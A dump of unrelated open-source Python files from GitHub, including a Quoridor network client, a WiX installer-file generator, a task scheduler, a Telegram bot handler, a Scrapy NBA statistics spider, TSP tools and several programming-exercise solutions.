except pickle.UnpicklingError:\n print(\"Received a non-Python object.\")\n\n except socket.timeout:\n print('request timed out / no server found')\n return list(serverList)\n\n def connect(self, ip: str, port: int) -> list[int]:\n \"\"\"connects the socket \"\"\"\n try:\n self.connection.connect((ip, port))\n print(\"Connection active\")\n serverMessage = self.connection.recv(4096)\n startVars = pickle.loads(serverMessage)\n print(\"startVars : \", startVars)\n return startVars\n except socket.error as e:\n print(\"Error on connection\")\n raise SystemExit from e\n\n def multiLaunch(self, fullScreen, startVars: list[int], clientListLen: int, host: bool, currentMenu: object) -> \\\n tuple[bool,\n int]:\n try:\n serverMessage = self.connection.recv(4096)\n print(\"received:\", serverMessage)\n unpickled_message = pickle.loads(serverMessage)\n print(\"unpickled : \", unpickled_message)\n if unpickled_message[0] != \"lenConnected\":\n print(\"starting game\", startVars)\n self.connection.setblocking(True)\n self.createGame(self.connection, fullScreen, startVars, host, currentMenu)\n\n return True, clientListLen\n else:\n print(\"connected players = \", unpickled_message[1])\n return False, int(unpickled_message[1])\n\n except Exception:\n return False, clientListLen\n\n def roomState(self):\n try:\n serverMessage = self.connection.recv(4096)\n return pickle.loads(serverMessage)\n\n except Exception:\n return\n\n @staticmethod\n def createGame(connection: socket.socket, fullScreen, startVars: list[Any], host: bool, currentMenu: object):\n \"\"\" creates an instance of the class: MultiplayerGame passing the user's choices as parameters \"\"\"\n print(\"Game infos:\", startVars)\n num = int(startVars[0])\n width = startVars[1]\n nbBarrier = startVars[2]\n nbPlayer = startVars[3]\n nbBots = startVars[4]\n startingPlayer = startVars[5]\n board = MultiplayerGame(connection, fullScreen, width, nbBarrier,\n nbPlayer, host, startingPlayer, nbBots, num)\n Menu.newMenu(currentMenu, board)\n\n @staticmethod\n def getSelfHost() -> str:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # Doesn't need to be reachable, it's used to make the OS determine the preferred outgoing IP interface\n s.connect(('10.255.255.255', 1))\n host = s.getsockname()[0]\n except Exception:\n host = '0.0.0.0' # Listen on all available interfaces\n finally:\n s.close()\n return host\n","repo_name":"Baptiste-Crepin/Quoridor","sub_path":"multi/discoveryServer.py","file_name":"discoveryServer.py","file_ext":"py","file_size_in_byte":4231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32569867248","text":"# Created by Jiří Strouhal (2023).\n# Written in Python 3.10.10\n# Licensed under the MIT License. See the LICENSE in the project root folder. \n# Public repository: https://github.com/jiristrouhal/makewxs.\n# Use MznStrouhal@gmail.com to reach the author.\n\n\nimport os\nimport xml.etree.ElementTree as et\n\nWXS_SCHEMA_LINK = \"http://wixtoolset.org/schemas/v4/wxs\"\nSDK = \"Wixtoolset.Sdk/4.0.0\"\nDEFAULT_DOWNGRADE_MESSAGE = \"A newer version has already been installed!\"\n\n\nWXS_OPENER = ''\nWXS_CLOSING = ''\n\nSTANDARD_DIRECTORY_OPENING = \"\\t\"\nSTANDARD_DIRECTORY_CLOSING = \"\\t\"\n\n\ndef write_component_groups_ref_xml(target_path:str,refs:str,project_name:str)->None:\n with open(target_path+\"/\"+project_name+\"_group_refs.xml\",'w') as group_refs_xml: group_refs_xml.write(refs)\n\ndef write_component_wxs(target_path:str,components:str,project_name:str)->None:\n components = WXS_OPENER + '\\n\\n' + \"\" + components + \"\" + '\\n' + WXS_CLOSING\n with open(target_path+\"/\"+project_name+\"_components.wxs\",'w') as component_wxs: component_wxs.write(components)\n\ndef write_dir_wxs(target_path:str,folders:str,project_name:str)->None:\n folders = STANDARD_DIRECTORY_OPENING + folders + '\\n' + STANDARD_DIRECTORY_CLOSING\n folders = WXS_OPENER + '\\n\\n' + \"\\n\" + folders + \"\\n\" + '\\n\\n' + WXS_CLOSING\n with open(target_path+\"/\"+project_name+\"_dirs.wxs\",'w') as folder_wxs: \n folder_wxs.write(folders)\n\ndef write_base_wxs_if_missing(target_path:str,project_name:str)->None:\n file_path = os.path.join(target_path,project_name+\".wxs\")\n try: \n et.parse(file_path)\n except: \n wxs_root = et.Element(\"Wix\", attrib={\"xmlns\":WXS_SCHEMA_LINK})\n package = et.SubElement(wxs_root,\"Package\", attrib={\"Name\":project_name, \"Manufacturer\":\"\",\"Version\":\"M.m.p\",\"UpgradeCode\":\"\"})\n et.SubElement(package,\"MajorUpgrade\", attrib={\"DowngradeErrorMessage\":DEFAULT_DOWNGRADE_MESSAGE})\n main_feature = et.SubElement(package,\"Feature\",attrib={\"Id\":\"Main\"})\n et.SubElement(main_feature,\"ComponentGroupRef\")\n et.indent(wxs_root,space=\"\\t\")\n et.ElementTree(wxs_root).write(file_path,encoding=\"UTF-8\",xml_declaration=True)\n\n\ndef write_wixproj_if_missing(target_path:str,project_name:str)->None:\n file_path = os.path.join(target_path,project_name+\".wixproj\")\n try: \n et.parse(file_path)\n except: \n wxs_root = et.Element(\"Project\", attrib={\"Sdk\":SDK})\n et.indent(wxs_root,space=\"\\t\")\n et.ElementTree(wxs_root).write(file_path)\n\n","repo_name":"jiristrouhal/makewxs","sub_path":"src/write_wxs_files.py","file_name":"write_wxs_files.py","file_ext":"py","file_size_in_byte":2650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4027269949","text":"import socket\nimport sys\nimport time\n\nfrom tqueue import TQueue\n\nclass Scheduler:\n def __init__(self):\n self.t_queue = TQueue() # waiting for a given time\n self.i_queue = [] # run as soon as possible\n self.alive = False\n\n def run(self):\n self.alive = True\n while (self.alive):\n # run all functions that can be run instantly\n if (len(self.i_queue) > 0):\n self.i_queue.pop(0)()\n # run all functions whose timeout has passed\n while (self.t_queue.get_closest_time() and\n self.t_queue.get_closest_time() < time.time()):\n self.t_queue.pop()()\n\n def call(self, func):\n self.i_queue.append(func)\n\n def set_timeout(self, func, timeout):\n self.t_queue.push(time.time() + timeout, func)\n\n def kill(self):\n self.alive = False\n\nS = Scheduler()\n\nif __name__ == \"__main__\":\n print (\"testing scheduler...\")\n start_time = time.time()\n a = []\n def print_hello():\n a.append(\"a\")\n if (start_time + 1 < time.time()):\n S.kill()\n S.set_timeout(print_hello, 0.1)\n S.set_timeout(print_hello, 0.1)\n S.run()\n assert(len(a) == 10)\n a = []\n def appendTo(a):\n a.append(\"a\")\n return len(a)\n\n def rep_append():\n if (appendTo(a) > 5):\n S.kill()\n S.call(rep_append)\n S.call(rep_append)\n S.run()\n assert(len(a) == 6)\n print (\"...passed\")\n","repo_name":"Alex-Padron/personal-projects","sub_path":"scheduler-python/scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":1479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17814891694","text":"from aiogram import Router, F\nfrom aiogram.exceptions import TelegramBadRequest\nfrom aiogram.filters import StateFilter, or_f\nfrom aiogram.fsm.context import FSMContext\nfrom aiogram.types import CallbackQuery\nfrom fluentogram import TranslatorRunner\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom tg_bot.keyboards.groups import get_groups_keyboard\nfrom tg_bot.keyboards.pagination import get_back_keyboad\nfrom tg_bot.states.mailing import FSMMailing\nfrom tg_bot.utils.cache.cache_access import CacheAccess\nfrom tg_bot.utils.paginator import slice_dict, get_current_page_from_dict\nfrom tg_bot.utils.process_group import get_group_dict\nfrom tg_bot.utils.process_mailing import change_group\n\nrouter: Router = Router()\n\n@router.callback_query(F.data == 'group', StateFilter(FSMMailing.view_mailing_menu))\nasync def process_edit_group(callback: CallbackQuery, lexicon: TranslatorRunner, state: FSMContext,\n session: AsyncSession, cache: CacheAccess):\n group_dict = await get_group_dict(session, cache)\n result_dict, num_pages = slice_dict(group_dict, num_elements=6)\n await state.update_data(result_dict=result_dict, num_pages=num_pages, current_page=0)\n keyboard = await get_groups_keyboard(result_dict['0'])\n await callback.message.edit_text(text=lexicon.select.group(), reply_markup=keyboard)\n await state.set_state(FSMMailing.change_group)\n\n\n@router.callback_query(or_f(F.data == 'previous', F.data == 'next'), StateFilter(FSMMailing.change_group))\nasync def process_paginator_groups(callback: CallbackQuery, state: FSMContext, lexicon: TranslatorRunner):\n is_next = True if callback.data == 'next' else False\n posts_group: dict[str: str] = await get_current_page_from_dict(state, is_next)\n keyboard = await get_groups_keyboard(posts_group)\n\n try:\n await callback.message.edit_text(text=lexicon.current.group(text=lexicon.select.group(), reply_markup=keyboard))\n except TelegramBadRequest:\n await callback.answer()\n\n\n@router.callback_query(StateFilter(FSMMailing.change_group))\nasync def process_change_group(callback: CallbackQuery, state: FSMContext, lexicon: TranslatorRunner, session: AsyncSession):\n data = await state.get_data()\n mailing_id = data['mailing_id']\n\n try:\n await change_group(session, int(mailing_id), int(callback.data))\n current_page = data['current_page']\n group_dict = data['result_dict']\n group_name = group_dict[str(current_page)][callback.data]\n keyboard = await get_back_keyboad(lexicon)\n await callback.message.edit_text(text=lexicon.group.changed(name=group_name), reply_markup=keyboard)\n await state.set_state(FSMMailing.group_changed)\n except AttributeError:\n keyboard = await get_back_keyboad(lexicon)\n await callback.message.edit_text(text=lexicon.mailing.notfound(), reply_markup=keyboard)\n await state.set_state(FSMMailing.error_state)\n\n\n","repo_name":"ChronoDi/AutoPostingBot","sub_path":"tg_bot/handlers/admin/mailing/edit_mailing/change_group.py","file_name":"change_group.py","file_ext":"py","file_size_in_byte":2936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31738969289","text":"from pyrsistent import b\n\n\ndef processCmd(cmd):\n cmd_name = ''\n para_list = []\n new_cmd = cmd.replace(' ','',) # remove space\n para_num = new_cmd.count('/')\n if para_num == 0:\n cmd_name = new_cmd\n else:\n cmd_list = new_cmd.split('/')\n cmd_name = cmd_list[0]\n para_list = cmd_list[1: -1]\n para_list.append(cmd_list[-1])\n return cmd_name, para_list\n","repo_name":"LucasXingg/Game-of-Life","sub_path":"cmdOperation.py","file_name":"cmdOperation.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17415862547","text":"# Common tools used for multiple algorithms\nfrom math import sqrt\nimport os\n\n\nclass Node:\n \"\"\"A single node on a map for readability\"\"\"\n\n def __init__(self, index, x, y):\n self.index = index\n self.x = x\n self.y = y\n\n\n# Finds the distance between two nodes\ndef find_dist(node_a, node_b):\n \"\"\"Finds the distance between two given points\"\"\"\n return sqrt((node_a.x - node_b.x) ** 2 +\n (node_a.y - node_b.y) ** 2)\n\n\nclass Tour:\n \"\"\"A whole map. Contains the route, filename and variety of tools\"\"\"\n\n def __init__(self):\n self.route = []\n self._last_measured = [] # Updates whenever get_dist is used\n self._file_name = \"\"\n self._distance = -1\n\n self.run_time = 0\n self.date_solved = \"\"\n self.algorithm_name = \"\"\n self.comment = \"\"\n\n def __len__(self):\n \"\"\"Overloads the len() function for readability\"\"\"\n return len(self.route)\n\n def find_nodes(self, file_name):\n \"\"\"Imports all the nodes in the city\"\"\"\n # Make sure route is clear\n self.route.clear()\n # Get the file open\n\n self._file_name = file_name\n file_path = ''\n if os.path.isabs(self._file_name):\n file_path = self._file_name\n else:\n file_path = \"TSP_EUC/\" + self._file_name\n file = open(file_path, \"r\")\n # The coordinates always start on the 7th line so just skip to it\n for line in file:\n if \"COMMENT\" in line:\n self.comment = line[10:-1]\n elif \"NODE_COORD_SECTION\" in line:\n break\n\n # Find all the nodes\n for line in file:\n if \"EOF\" not in line:\n line = line.split()\n self.route.append(Node(float(line[0]), float(line[1]), float(line[2])))\n else:\n break\n\n def get_dist(self):\n \"\"\"Finds the length of the tour\"\"\"\n # If its already found just return it\n if self.route == self._last_measured:\n return self._distance\n self._distance = 0\n for i in range(len(self.route) - 1):\n self._distance += find_dist(self.route[i], self.route[i + 1])\n # Return back to starting point\n self._distance += find_dist(self.route[-1], self.route[0])\n # Reset _last_measured\n self._last_measured = self.route.copy()\n return self._distance\n\n def print_map(self):\n \"\"\"Prints the map in the specified format\"\"\"\n print(self._file_name)\n printed_points = []\n\n print(\"Tour Length: \", self.get_dist())\n print(\"Tour:\")\n for point in self.route:\n if point.index in printed_points:\n # Announce there's a duplicate if one's found\n print(\"ERROR: Duplicate found\", point.index)\n print(point.index)\n printed_points.append(point.index)\n print(\"-1\")\n # Report any missing nodes\n for i in range(len(self.route)):\n if i + 1 not in printed_points:\n print(\"Node\", i, \"seems to be missing!\")\n","repo_name":"zelestis/TravellingSalesPersonPython","sub_path":"TSP_tools.py","file_name":"TSP_tools.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6728594694","text":"from sys import stdin\n\nT = int(stdin.readline())\nfor i in range(T):\n N = int(input())\n arr = list(map(lambda x: int(x) - 1, input().split()))\n checked = [False for i in range(N)]\n\n res = 0\n for i in range(N):\n if checked[i]:\n continue\n res += 1\n checked[i] = True\n j = arr[i]\n\n while not checked[j]:\n checked[j] = True\n j = arr[j]\n\n print(res)\n","repo_name":"woohyunjng/Coding-Practice","sub_path":"Python/Baekjoon/10000/10451.py","file_name":"10451.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18874445037","text":"T = 10\r\n# 여러개의 테스트 케이스가 주어지므로, 각각을 처리합니다.\r\nfor test_case in range(1, T+1):\r\n n=int(input())#회문 길이 입력\r\n arr =[list(input()) for i in range(100)]#글자판 입력\r\n max_list=[0,0]\r\n\r\n # 행에 있는 회문을 찾는 for문\r\n for i in range(100):#열\r\n for i2 in range(100):#행\r\n li1 = []\r\n li2 = []\r\n for i3 in range(i2,100):#한 행/열 내부에 있는 회문 체크\r\n li1+=arr[i][i3]\r\n li2 += arr[i3][i]\r\n if''.join(reversed(li1))==''.join(li1) and len(li1)>max_list[0]:\r\n max_list[0]=len(li1)\r\n if''.join(reversed(li2))==''.join(li2) and len(li2)>max_list[1]:\r\n max_list[1]=len(li1)\r\n print('#{} {}'.format(test_case,max(max_list)))#제일 긴 것 출력","repo_name":"world970511/study","sub_path":"ssafy_ready/1216.py","file_name":"1216.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16951573921","text":"# -*- coding: utf-8 -*-\nimport dateutil.parser\nimport pandas as pd\nimport scrapy\nfrom parsel import Selector\nfrom scrapy.http import Request\nfrom nba.items import PerfItem\n\nconference_map = {\n \"Atlanta Hawks\": \"E\",\n \"Boston Celtics\": \"E\",\n \"Brooklyn Nets\": \"E\",\n \"Charlotte Bobcats\": \"E\",\n \"Charlotte Hornets\": \"E\",\n \"Chicago Bulls\": \"E\",\n \"Cleveland Cavaliers\": \"E\",\n \"Dallas Mavericks\": \"W\",\n \"Denver Nuggets\": \"W\",\n \"Detroit Pistons\": \"E\",\n \"Golden State Warriors\": \"W\",\n \"Houston Rockets\": \"W\",\n \"Indiana Pacers\": \"E\",\n \"Los Angeles Clippers\": \"W\",\n \"Los Angeles Lakers\": \"W\",\n \"Memphis Grizzlies\": \"W\",\n \"Miami Heat\": \"E\",\n \"Milwaukee Bucks\": \"E\",\n \"Minnesota Timberwolves\": \"W\",\n \"New Jersey Nets\": \"E\",\n \"New Orleans Hornets\": \"E\",\n \"New Orleans Pelicans\": \"W\",\n \"New Orleans/Oklahoma City Hornets\": \"W\",\n \"New York Knicks\": \"E\",\n \"Oklahoma City Thunder\": \"W\",\n \"Orlando Magic\": \"E\",\n \"Philadelphia 76ers\": \"E\",\n \"Phoenix Suns\": \"W\",\n \"Portland Trail Blazers\": \"W\",\n \"Sacramento Kings\": \"W\",\n \"San Antonio Spurs\": \"W\",\n \"Seattle SuperSonics\": \"W\",\n \"Toronto Raptors\": \"E\",\n \"Utah Jazz\": \"W\",\n \"Vancouver Grizzlies\": \"W\",\n \"Washington Wizards\": \"E\",\n}\n\n\nclass PerfSpider(scrapy.Spider):\n name = \"perf\"\n allowed_domains = [\"basketball-reference.com\"]\n start_urls = [\"http://basketball-reference.com/\"]\n custom_settings = {\n # exported fields and order\n \"FEED_EXPORT_FIELDS\": [\n \"date\",\n \"team\",\n \"conference\",\n \"pace\",\n \"ortg\",\n \"free_throw_rate\",\n \"three_pt_att_rate\",\n \"true_shooting_pct\",\n \"total_rebound_pct\",\n \"team_steal_pct\",\n \"team_block_pct\",\n \"effective_fg_pct\",\n \"turnovers_per100\",\n \"off_rebound_pct\",\n \"def_rebound_pct\",\n ]\n }\n\n def start_requests(self):\n seasons = range(2001, 2020)\n urls = [\n f\"https://www.basketball-reference.com/leagues/NBA_{season}_games.html\"\n for season in seasons\n ]\n return [Request(url=url) for url in urls]\n\n def parse(self, response):\n # Go to each month page\n xp = \"//div[@class='filter']/div/a/@href\"\n urls = response.xpath(xp).extract()\n yield from [\n Request(url=response.urljoin(url), callback=self.parse_month)\n for url in urls\n ]\n\n def parse_month(self, response):\n # Go to the Box Score page for each game\n xp = \"//td[@data-stat='box_score_text']/a/@href\"\n urls = response.xpath(xp).extract()\n yield from [\n Request(url=response.urljoin(url), callback=self.parse_box) for url in urls\n ]\n\n def parse_box(self, response):\n # Extract performance metrics for each team\n teams_xp = \"//a[@itemprop='name']/text()\"\n info_xp = \"//div[@class='scorebox_meta']/div/text()\"\n teams = response.xpath(teams_xp).extract()\n date_ = response.xpath(info_xp).extract_first()\n date_ = dateutil.parser.parse(date_)\n game_date = f\"{date_.date()}\"\n\n pace_xp = '//td[@data-stat=\"off_rtg\"]/text()'\n pace_comment_xp = \"//comment()[contains(., 'Pace Factor')]\"\n\n comment = (\n response.xpath(pace_comment_xp)\n .extract_first()\n .replace(\"\", \"\")\n )\n sel = Selector(comment)\n pace = sel.xpath(pace_xp).extract()\n\n ftr_xp = '//tfoot/tr/td[@data-stat=\"fta_per_fga_pct\"]/text()'\n tpar_xp = '//tfoot/tr/td[@data-stat=\"fg3a_per_fga_pct\"]/text()'\n tshp_xp = '//tfoot/tr/td[@data-stat=\"ts_pct\"]/text()'\n trp_xp = '//tfoot/tr/td[@data-stat=\"trb_pct\"]/text()'\n stp_xp = '//tfoot/tr/td[@data-stat=\"stl_pct\"]/text()'\n bp_xp = '//tfoot/tr/td[@data-stat=\"blk_pct\"]/text()'\n efgp_xp = '//tfoot/tr/td[@data-stat=\"efg_pct\"]/text()'\n tp100_xp = '//tfoot/tr/td[@data-stat=\"tov_pct\"]/text()'\n orp_xp = '//tfoot/tr/td[@data-stat=\"orb_pct\"]/text()'\n drp_xp = '//tfoot/tr/td[@data-stat=\"drb_pct\"]/text()'\n\n df = pd.DataFrame(\n {\n \"date\": [game_date] * 2,\n \"team\": teams,\n \"conference\": [conference_map[team] for team in teams],\n \"pace\": pace,\n \"free_throw_rate\": response.xpath(ftr_xp).extract(),\n \"three_pt_att_rate\": response.xpath(tpar_xp).extract(),\n \"true_shooting_pct\": response.xpath(tshp_xp).extract(),\n \"total_rebound_pct\": response.xpath(trp_xp).extract(),\n \"team_steal_pct\": response.xpath(stp_xp).extract(),\n \"team_block_pct\": response.xpath(bp_xp).extract(),\n \"effective_fg_pct\": response.xpath(efgp_xp).extract(),\n \"turnovers_per100\": response.xpath(tp100_xp).extract(),\n \"off_rebound_pct\": response.xpath(orp_xp).extract(),\n \"def_rebound_pct\": response.xpath(drp_xp).extract(),\n }\n )\n numeric_columns = [\n c for c in df.columns if c not in [\"date\", \"team\", \"conference\"]\n ]\n for c in numeric_columns:\n df[c] = df[c].astype(float)\n\n records = df.to_dict(orient=\"records\")\n for rec in records:\n yield PerfItem(rec)\n","repo_name":"dvukolov/nba-conference","sub_path":"scrapy/nba/spiders/perf.py","file_name":"perf.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18481495221","text":"#_*_coding:utf8\n#função que calcula os dias\ndef calc_dias(data_paga,data_venc):\n partes1=data_paga.split(\"/\")\n partes2=data_venc.split(\"/\")\n anos=int(partes1[2])-int(partes2[2])\n meses=int(partes1[1])-int(partes2[1])\n dias=int(partes1[0])-int(partes2[0])+31*(meses)+365*(anos)\n return dias\n#função que valida a data\ndef check_data(data):\n try:\n partes=data.split(\"/\")\n if len(partes[2])!=4 or len(partes)!=3:\n return False\n elif int(partes[1])>12 or 1>int(partes[1]):\n return False\n elif int(partes[0])>31 or 1>int(partes[0]):\n return False\n return True\n except:\n return(False)\ndocumentos=[]\nfor i in range(2):\n doc={}\n n_documento=int(input(\"Insira o número do documeto: \"))\n cod_cliente = input(\"Insira o código do cliente: \")\n #Loop para verificar a data.\n run=True\n while run:\n data_vencimento=input(\"Insira a data de vencimento no formato dd/dd/dddd: \")\n data_pagamento=input(\"Insira a data de pagamento no formato dd/dd/dddd:\")\n if not(check_data(data_vencimento)) or not(check_data(data_vencimento)):\n print(\"Data Inválida!\")\n else:\n run=False\n \n valor_conta=float(input(\"Insira o valor da conta: \"))\n valor_juros=0\n #inserção dos dados no dic doc.\n doc[\"n_documento\"]=n_documento\n doc[\"cod_cliente\"]=cod_cliente\n doc[\"data_vencimento\"]=data_vencimento\n doc[\"data_pagamento\"]=data_pagamento\n doc[\"valor_conta\"]=valor_conta\n doc[\"valor_juros\"]=valor_juros\n documentos.append(doc)\n print(\"\\n\\n\")\ntotal=0\nfor k in documentos:\n dias=calc_dias(k[\"data_pagamento\"],k[\"data_vencimento\"])\n juros=(0.0002*k[\"valor_conta\"])*dias\n k[\"valor_juros\"]=juros\n total+=k[\"valor_conta\"]+k[\"valor_juros\"]\n\nprint(\"O total arrecadado com juros é de %.2f\" %(total))\n","repo_name":"MatheusSC23/FUP","sub_path":"Lista_08/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32283791135","text":"import sys\nsys.setrecursionlimit(3000000)\ninput = sys.stdin.readline\n\n\nn,m = map(int,input().split())\n# n이 가로 m 이 세로\nw=b=0\n\ndx= [1,0,-1,0]\ndy = [0,1,0,-1]\n\nvisited= [[False]*n for _ in range(m)]\n\nprint(visited)\n\n\ndef dfs(x,y,cnt):\n c=graph[x][y]\n graph[x][y]=1\n for i in range(4):\n nx = dx[i]+x\n ny = dy[i]+y\n if(0<= nx X (' + _tmp + '))']\n if s_state in trans_sys1.states.initial:\n _goto = ' || '.join(\n ['(' + statevar + ' = \"' + str(x) + '\" )' for x in trans_red.states.post(str(s_state))])\n sys_init += [_tmp + ' && ' + ' ( ' + _goto + ' ) ']\n trans_red.states.remove(str(s_state))\n\n # Remove unneeded labels\n trans_red.ap.remove('env_s')\n\n # Create needed additional specifications\n # - Environment variables and assumptions\n env_vars = list()\n env_init = list()\n env_safe = list()\n env_prog = list() # ['(env_actions= \"' + reach + '\")']\n\n # - System variables and requirements\n sys_vars = [x for x in trans_sys1.ap] # we assign the labels\n # to the control system (otherwise the GR1 synthesis will blow up the control synthesis)\n sys_prog = list()\n gr_sys = synth.sys_to_spec(trans_red, True, statevar)\n\n add_specs = gr_sys | spec.GRSpec(env_vars, sys_vars, env_init, sys_init,\n env_safe, sys_safe, env_prog, sys_prog)\n\n\n else:\n\n trans_red = trans_sys2.copy()\n reach = 'reach'\n stay = 'stay'\n sys_safe = list() # list of transitions to be added to the GR(1) specification\n sys_init = list()\n\n trans_red.actions['env_actions'] |= {reach, stay} # these are the action of the environment\n for s_state in trans_sys1.states():\n logger.info('removing state :' + str(s_state))\n labels = trans_sys1.states[s_state]\n _tmp = print_aps(labels, trans_sys1.ap)\n\n for (tr_state1, tr_state2) in it_product(trans_red.states.pre(str(s_state)),\n trans_red.states.post(str(s_state))):\n trans_red.transitions.add(tr_state1, tr_state2, env_actions=reach)\n for tr_state in trans_red.states.pre(str(s_state)):\n trans_red.transitions.add(tr_state, tr_state, env_actions=stay)\n sys_safe += ['(((' + statevar + ' = \"' + tr_state + '\") && X ( env_actions = \"' + reach + '\")) -> X ('\n + _tmp + '))']\n if s_state in trans_sys1.states.initial:\n _goto = ' || '.join(\n ['(' + statevar + ' = \"' + str(x) + '\" )' for x in trans_red.states.post(str(s_state))])\n sys_init += [_tmp + ' && ' + ' ( ' + _goto + ' ) ']\n trans_red.states.remove(str(s_state))\n\n for x in trans_sys1.ap:\n sys_safe += ['( !' + str(x) + ' & X ( env_actions = \"stay\")) -> ( X !' + str(x) + ')']\n sys_safe += ['( ' + str(x) + ' & X ( env_actions = \"stay\")) -> ( X ' + str(x) + ')']\n\n # Remove unneeded labels\n trans_red.ap.remove('env_s')\n\n # Create needed additional specifications\n # - Environment variables and assumptions\n env_vars = list()\n env_init = list()\n env_safe = list()\n env_prog = list() # ['(env_actions= \"' + reach + '\")']\n\n # - System variables and requirements\n sys_vars = [x for x in trans_sys1.ap] # we assign the labels\n # to the control system (otherwise the GR1 synthesis will blow up the control synthesis)\n sys_prog = list()\n\n add_specs = spec.GRSpec(env_vars, sys_vars, env_init, sys_init,\n env_safe, sys_safe, env_prog, sys_prog)\n\n if fullmodel:\n return trans_red, add_specs, trans_sys2\n return trans_red, add_specs\n\n\n\ndef async_prod(self, ts,ap = False,relabel=True):\n \"\"\"Asynchronous product TS1 x TS2 between FT Systems.\n\n See Also\n ========\n __or__, sync_prod, cartesian_product\n Def. 2.18, p.38 U{[BK08]\n }\n \"\"\"\n\n if not isinstance(ts, FiniteTransitionSystem):\n raise TypeError('ts must be a FiniteTransitionSystem.')\n\n prod_ts = transys.FiniteTransitionSystem()\n\n # Add all atomic propositions\n prod_ts.owner=self.owner\n prod_ts.name=self.name + '_' + ts.name\n # for parallel product: union of action sets\n prod_ts.actions['sys_actions'] |= self.actions['sys_actions'] | ts.actions['sys_actions']\n prod_ts.actions['env_actions'] |= self.actions['env_actions'] | ts.actions['env_actions']\n prod_aux = nx.product.cartesian_product(self, ts)\n state_to_i = dict((n, i) for (i, n) in enumerate(prod_aux.nodes()))\n\n i_to_state = dict((i,i) for (i, n) in enumerate(prod_aux.nodes()))\n\n for state,i in state_to_i.items():\n if ap == True:\n prod_ts.atomic_propositions |= {str(self.node[state[0]]['ap'] | ts.node[state[1]]['ap'])}\n prod_ts.add_node(i, ap={str(self.node[state[0]]['ap'] | ts.node[state[1]]['ap'])})\n else :\n\n prod_ts.add_node(i)\n # Assume for a moment that each of the system has atomic proposition\n for key in ts.node[state[1]].keys():\n if ('ap' == key) and (ts.node[state[1]]['ap']!= set()):\n prod_ts.node[i]['ap_' + ts.name] = ts.node[state[1]]['ap']\n elif 'ap_' in key:\n prod_ts.node[i][key] = ts.node[state[1]][key]\n\n for key in self.node[state[0]].keys():\n if ('ap' == key) and (self.node[state[0]]['ap'] != set()):\n prod_ts.node[i]['ap_' + self.name] = self.node[state[0]]['ap']\n else:\n prod_ts.node[i][key] = self.node[state[0]][key]\n\n\n for edge in prod_aux.edges():\n #print(edge)\n for _x, _y, label in self.transitions.find({edge[0][0]}, {edge[1][0]}):\n #print([_x, _y, label])\n prod_ts.transitions.add(state_to_i[edge[0]], state_to_i[edge[1]], **label)\n for _x, _y, label in ts.transitions.find({edge[0][1]}, {edge[1][1]}):\n #print([_x, _y, label])\n prod_ts.transitions.add(state_to_i[edge[0]], state_to_i[edge[1]], **label)\n\n for (initx, inity) in product(self.states.initial, ts.states.initial):\n prod_ts.states.initial |= {state_to_i[(initx, inity)]}\n\n\n return prod_ts\n\n\ndef fts2mealy(ts, env_name='move', reach_name='reach'):\n \"\"\" \n Get a mealy machine with reach + move state on all transitions \n Parameters\n ----------\n ts : FTS \n env_name='move' : label for on transitions environment action\n reach='reach' : ouput of each transition\n\n \"\"\"\n h = transys.MealyMachine()\n\n mlist = list()\n for node in ts.nodes():\n mlist += [node]\n\n inputs = transys.machines.create_machine_ports(dict({env_name: mlist}))\n h.add_inputs(inputs)\n outputs = transys.machines.create_machine_ports(dict({reach_name: 'boolean'}))\n h.add_outputs(outputs)\n\n h.add_nodes_from(ts.nodes())\n for (st1, st2) in ts.transitions():\n q = {reach_name: 1, env_name: st2}\n h.transitions.add(st1, st2, **dict(q))\n\n for init in ts.states.initial:\n h.states.initial |= {init}\n\n return h\n\n\n\ndef fts2SC(ts, env_name='ctrl', act='act'):\n \"\"\" \n Get a mealy machine with reach + move state on all transitions \n Parameters\n ----------\n ts : FTS \n env_name='move' : label for on transitions environment action\n reach='reach' : ouput of each transition\n\n \"\"\"\n h = transys.MealyMachine()\n\n mlist = list()\n for node in ts.nodes():\n mlist += [node]\n\n inputs = transys.machines.create_machine_ports(dict({env_name: mlist}))\n h.add_inputs(inputs)\n outputs = transys.machines.create_machine_ports(dict({act: mlist}))\n h.add_outputs(outputs)\n\n h.add_nodes_from(ts.nodes())\n for (st1, st2) in ts.transitions():\n q = {env_name: st2, act:st2}\n h.transitions.add(st1, st2, **dict(q))\n h.add_node('Minit')\n h.states.initial|={'Minit'}\n for init in ts.states.initial:\n q = {env_name: init, act: init}\n h.transitions.add('Minit', init, **dict(q))\n return h\n\n\ndef trans_complete(ts):\n \"\"\"Complete FTS with selfloops for all alternative system actions\n Specifically go from a TransSys1 to TransSys2: \n TransSys1\n * Nodes = represent locations or states, owned by environment\n * Edges = control actions by system ending in a new state\n\n\n TransSys2:\n * Nodes = Represents a move towards a specific state (owned by environment)\n * Edges = contains Arrival at state (dictated by environment) + decision to move to new state\n\n @param trans_sys1: FiniteTransitionSystem()\n @param statevar: string name of locations in trans_sys1\n\n\n \"\"\"\n # - - - - Check incoming arguments - - - - - - - -\n # 1 Check whether the given transition system is actually a transition system\n\n\n assert ts.owner == 